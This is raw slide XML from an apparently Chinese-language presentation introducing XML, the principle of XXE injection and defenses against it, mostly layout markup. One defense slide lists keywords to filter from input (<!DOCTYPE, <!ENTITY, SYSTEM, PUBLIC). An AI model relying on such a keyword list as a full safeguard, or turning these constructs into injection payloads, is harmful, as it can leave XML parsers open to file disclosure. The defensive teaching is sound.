                    <a:gs pos="100000">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="1"/>
                  <a:tileRect/>
                </a:gradFill>
              </a:ln>
              <a:effectLst>
                <a:innerShdw blurRad="254000" dist="1270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圆角矩形 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1971639" y="1363944"/>
                <a:ext cx="1680278" cy="1680278"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 19112"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="100000">
                    <a:srgbClr val="E0E0E0"/>
                  </a:gs>
                  <a:gs pos="0">
                    <a:schemeClr val="bg1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="2700000" scaled="1"/>
              </a:gradFill>
              <a:ln w="101600">
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw blurRad="177800" dist="88900" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                    <a:alpha val="6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4" name="组合 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3081701" y="3076402"/>
              <a:ext cx="1071601" cy="993534"/>
              <a:chOff x="3503864" y="2079606"/>
              <a:chExt cx="1071601" cy="993534"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="文本框 7"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3503864" y="2427980"/>
                <a:ext cx="1071601"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rPr>
                  <a:t>04</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US"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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="文本框 8"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3597472" y="2079606"/>
                <a:ext cx="884387"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rPr>
                  <a:t>PRAT</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US"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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4126230" y="3217545"/>
            <a:ext cx="6635115" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B9998D"/>
                </a:solidFill>
                <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B9998D"/>
                </a:solidFill>
                <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>漏洞防御办法</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309594" y="1904636"/>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2" name="Freeform: Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2553432" y="5512619"/>
            <a:ext cx="3253914" cy="1330633"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3185651"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1533833"/>
              <a:gd name="connsiteX1" fmla="*/ 884903 w 3185651"/>
              <a:gd name="connsiteY1" fmla="*/ 796413 h 1533833"/>
              <a:gd name="connsiteX2" fmla="*/ 2595716 w 3185651"/>
              <a:gd name="connsiteY2" fmla="*/ 943897 h 1533833"/>
              <a:gd name="connsiteX3" fmla="*/ 3185651 w 3185651"/>
              <a:gd name="connsiteY3" fmla="*/ 1533833 h 1533833"/>
              <a:gd name="connsiteX0-1" fmla="*/ 0 w 3185651"/>
              <a:gd name="connsiteY0-2" fmla="*/ 0 h 1533833"/>
              <a:gd name="connsiteX1-3" fmla="*/ 884903 w 3185651"/>
              <a:gd name="connsiteY1-4" fmla="*/ 796413 h 1533833"/>
              <a:gd name="connsiteX2-5" fmla="*/ 2552173 w 3185651"/>
              <a:gd name="connsiteY2-6" fmla="*/ 1074525 h 1533833"/>
              <a:gd name="connsiteX3-7" fmla="*/ 3185651 w 3185651"/>
              <a:gd name="connsiteY3-8" fmla="*/ 1533833 h 1533833"/>
              <a:gd name="connsiteX0-9" fmla="*/ 0 w 3185651"/>
              <a:gd name="connsiteY0-10" fmla="*/ 0 h 1533833"/>
              <a:gd name="connsiteX1-11" fmla="*/ 572483 w 3185651"/>
              <a:gd name="connsiteY1-12" fmla="*/ 842133 h 1533833"/>
              <a:gd name="connsiteX2-13" fmla="*/ 2552173 w 3185651"/>
              <a:gd name="connsiteY2-14" fmla="*/ 1074525 h 1533833"/>
              <a:gd name="connsiteX3-15" fmla="*/ 3185651 w 3185651"/>
              <a:gd name="connsiteY3-16" fmla="*/ 1533833 h 1533833"/>
              <a:gd name="connsiteX0-17" fmla="*/ 0 w 3185651"/>
              <a:gd name="connsiteY0-18" fmla="*/ 0 h 1533833"/>
              <a:gd name="connsiteX1-19" fmla="*/ 572483 w 3185651"/>
              <a:gd name="connsiteY1-20" fmla="*/ 842133 h 1533833"/>
              <a:gd name="connsiteX2-21" fmla="*/ 2552173 w 3185651"/>
              <a:gd name="connsiteY2-22" fmla="*/ 1074525 h 1533833"/>
              <a:gd name="connsiteX3-23" fmla="*/ 3185651 w 3185651"/>
              <a:gd name="connsiteY3-24" fmla="*/ 1533833 h 1533833"/>
              <a:gd name="connsiteX0-25" fmla="*/ 0 w 3185651"/>
              <a:gd name="connsiteY0-26" fmla="*/ 0 h 1533833"/>
              <a:gd name="connsiteX1-27" fmla="*/ 572483 w 3185651"/>
              <a:gd name="connsiteY1-28" fmla="*/ 842133 h 1533833"/>
              <a:gd name="connsiteX2-29" fmla="*/ 2552173 w 3185651"/>
              <a:gd name="connsiteY2-30" fmla="*/ 1074525 h 1533833"/>
              <a:gd name="connsiteX3-31" fmla="*/ 3185651 w 3185651"/>
              <a:gd name="connsiteY3-32" fmla="*/ 1533833 h 1533833"/>
              <a:gd name="connsiteX0-33" fmla="*/ 0 w 3185651"/>
              <a:gd name="connsiteY0-34" fmla="*/ 0 h 1533833"/>
              <a:gd name="connsiteX1-35" fmla="*/ 572483 w 3185651"/>
              <a:gd name="connsiteY1-36" fmla="*/ 842133 h 1533833"/>
              <a:gd name="connsiteX2-37" fmla="*/ 2552173 w 3185651"/>
              <a:gd name="connsiteY2-38" fmla="*/ 1074525 h 1533833"/>
              <a:gd name="connsiteX3-39" fmla="*/ 3185651 w 3185651"/>
              <a:gd name="connsiteY3-40" fmla="*/ 1533833 h 1533833"/>
              <a:gd name="connsiteX0-41" fmla="*/ 0 w 3204701"/>
              <a:gd name="connsiteY0-42" fmla="*/ 0 h 1400483"/>
              <a:gd name="connsiteX1-43" fmla="*/ 591533 w 3204701"/>
              <a:gd name="connsiteY1-44" fmla="*/ 708783 h 1400483"/>
              <a:gd name="connsiteX2-45" fmla="*/ 2571223 w 3204701"/>
              <a:gd name="connsiteY2-46" fmla="*/ 941175 h 1400483"/>
              <a:gd name="connsiteX3-47" fmla="*/ 3204701 w 3204701"/>
              <a:gd name="connsiteY3-48" fmla="*/ 1400483 h 1400483"/>
              <a:gd name="connsiteX0-49" fmla="*/ 0 w 3204701"/>
              <a:gd name="connsiteY0-50" fmla="*/ 0 h 1400483"/>
              <a:gd name="connsiteX1-51" fmla="*/ 591533 w 3204701"/>
              <a:gd name="connsiteY1-52" fmla="*/ 708783 h 1400483"/>
              <a:gd name="connsiteX2-53" fmla="*/ 2571223 w 3204701"/>
              <a:gd name="connsiteY2-54" fmla="*/ 941175 h 1400483"/>
              <a:gd name="connsiteX3-55" fmla="*/ 3204701 w 3204701"/>
              <a:gd name="connsiteY3-56" fmla="*/ 1400483 h 1400483"/>
              <a:gd name="connsiteX0-57" fmla="*/ 0 w 3192001"/>
              <a:gd name="connsiteY0-58" fmla="*/ 0 h 1463983"/>
              <a:gd name="connsiteX1-59" fmla="*/ 578833 w 3192001"/>
              <a:gd name="connsiteY1-60" fmla="*/ 772283 h 1463983"/>
              <a:gd name="connsiteX2-61" fmla="*/ 2558523 w 3192001"/>
              <a:gd name="connsiteY2-62" fmla="*/ 1004675 h 1463983"/>
              <a:gd name="connsiteX3-63" fmla="*/ 3192001 w 3192001"/>
              <a:gd name="connsiteY3-64" fmla="*/ 1463983 h 1463983"/>
              <a:gd name="connsiteX0-65" fmla="*/ 5702 w 3197703"/>
              <a:gd name="connsiteY0-66" fmla="*/ 0 h 1463983"/>
              <a:gd name="connsiteX1-67" fmla="*/ 584535 w 3197703"/>
              <a:gd name="connsiteY1-68" fmla="*/ 772283 h 1463983"/>
              <a:gd name="connsiteX2-69" fmla="*/ 2564225 w 3197703"/>
              <a:gd name="connsiteY2-70" fmla="*/ 1004675 h 1463983"/>
              <a:gd name="connsiteX3-71" fmla="*/ 3197703 w 3197703"/>
              <a:gd name="connsiteY3-72" fmla="*/ 1463983 h 1463983"/>
              <a:gd name="connsiteX0-73" fmla="*/ 5428 w 3197429"/>
              <a:gd name="connsiteY0-74" fmla="*/ 0 h 1463983"/>
              <a:gd name="connsiteX1-75" fmla="*/ 596961 w 3197429"/>
              <a:gd name="connsiteY1-76" fmla="*/ 854833 h 1463983"/>
              <a:gd name="connsiteX2-77" fmla="*/ 2563951 w 3197429"/>
              <a:gd name="connsiteY2-78" fmla="*/ 1004675 h 1463983"/>
              <a:gd name="connsiteX3-79" fmla="*/ 3197429 w 3197429"/>
              <a:gd name="connsiteY3-80" fmla="*/ 1463983 h 1463983"/>
              <a:gd name="connsiteX0-81" fmla="*/ 4527 w 3258441"/>
              <a:gd name="connsiteY0-82" fmla="*/ 0 h 1330633"/>
              <a:gd name="connsiteX1-83" fmla="*/ 657973 w 3258441"/>
              <a:gd name="connsiteY1-84" fmla="*/ 721483 h 1330633"/>
              <a:gd name="connsiteX2-85" fmla="*/ 2624963 w 3258441"/>
              <a:gd name="connsiteY2-86" fmla="*/ 871325 h 1330633"/>
              <a:gd name="connsiteX3-87" fmla="*/ 3258441 w 3258441"/>
              <a:gd name="connsiteY3-88" fmla="*/ 1330633 h 1330633"/>
              <a:gd name="connsiteX0-89" fmla="*/ 0 w 3253914"/>
              <a:gd name="connsiteY0-90" fmla="*/ 0 h 1330633"/>
              <a:gd name="connsiteX1-91" fmla="*/ 653446 w 3253914"/>
              <a:gd name="connsiteY1-92" fmla="*/ 721483 h 1330633"/>
              <a:gd name="connsiteX2-93" fmla="*/ 2620436 w 3253914"/>
              <a:gd name="connsiteY2-94" fmla="*/ 871325 h 1330633"/>
              <a:gd name="connsiteX3-95" fmla="*/ 3253914 w 3253914"/>
              <a:gd name="connsiteY3-96" fmla="*/ 1330633 h 1330633"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0-1" y="connsiteY0-2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1-3" y="connsiteY1-4"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2-5" y="connsiteY2-6"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3-7" y="connsiteY3-8"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3253914" h="1330633">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="52787" y="368443"/>
                  <a:pt x="216707" y="576262"/>
                  <a:pt x="653446" y="721483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1090185" y="866704"/>
                  <a:pt x="2187025" y="769800"/>
                  <a:pt x="2620436" y="871325"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3053847" y="972850"/>
                  <a:pt x="3173535" y="1127596"/>
                  <a:pt x="3253914" y="1330633"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100" cap="rnd">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6E69"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663450" y="2145928"/>
            <a:ext cx="7134055" cy="3366691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>指可扩展标记语言（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>eXtensible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Markup Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>）。它是一种用于描述和传输数据的标记语言。 </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旨在为不同计算机系统之间的数据交换提供通用性。它使用标记来定义数据元素，而这些标记与文本组合以表示数据的结构和内容。由于其灵活性和可扩展性，</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已成为</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开发，特别是在面向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>服务的应用程序中常用的格式之一。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>被设计用来传输和存储数据，不用于表现和展示数据，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>则用来表现数据。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3887710" y="1552119"/>
            <a:ext cx="4311444" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语言</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="845481" y="2235665"/>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688946" y="345014"/>
            <a:ext cx="2804633" cy="756108"/>
            <a:chOff x="4688946" y="345014"/>
            <a:chExt cx="2804633" cy="756108"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="文本框 24"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4688946" y="345014"/>
              <a:ext cx="2804633"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XXE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" spc="300" dirty="0">
                  <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>漏洞原理</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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="558074" y="2783631"/>
            <a:ext cx="2911833" cy="27348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30171" y="345014"/>
            <a:ext cx="3789045" cy="756108"/>
            <a:chOff x="4330171" y="345014"/>
            <a:chExt cx="3789045" cy="756108"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="文本框 36"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4330171" y="345014"/>
              <a:ext cx="3789045" cy="368935"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="dist"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>XXE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>漏洞防御办法</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="33" name="Group 55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5898809" y="1028097"/>
              <a:ext cx="362272" cy="73025"/>
              <a:chOff x="7340600" y="4686300"/>
              <a:chExt cx="504030" cy="101600"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="5EE2B1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34"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5"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36"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
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678180" y="1415415"/>
            <a:ext cx="11092815" cy="4707890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>禁用或限制外部实体</a:t>
            </a:r>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输入验证和过滤：通过使用白名单、黑名单、正则表达式等技术，过滤用户输入并确保它符合预期格式和结构，如过滤关键词： &lt;!DOCTYPE 和 &lt;!ENTITY ，或者 SYSTEM 和 PUBLIC，这可以防止攻击者在XML文档中插入或注入恶意实体</a:t>
            </a:r>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使用安全的XML解析器库：某些XML解析器可能存在安全漏洞，使用经过广泛测试和认证的XML库可以更好地避免此类漏洞，并提高处理性能和可靠性。</a:t>
            </a:r>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定期更新：及时更新软件及其配置，及早修补漏洞，提高系统的安全性。</a:t>
            </a:r>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649105" y="3528658"/>
            <a:ext cx="6893790" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B9998D"/>
                </a:solidFill>
                <a:latin typeface="思源黑体 CN Heavy" panose="020B0A00000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="思源黑体 CN Heavy" panose="020B0A00000000000000" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>如有不足敬请指正</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4118297" y="4521878"/>
            <a:ext cx="3955407" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B9998D"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>THANKS FOR YOUR WACTHING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图形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222" y="2204477"/>
            <a:ext cx="1193557" cy="11935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3" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2502511" y="1943619"/>
            <a:ext cx="7714707" cy="3782189"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pP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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XML External Entity Injection</a:t>
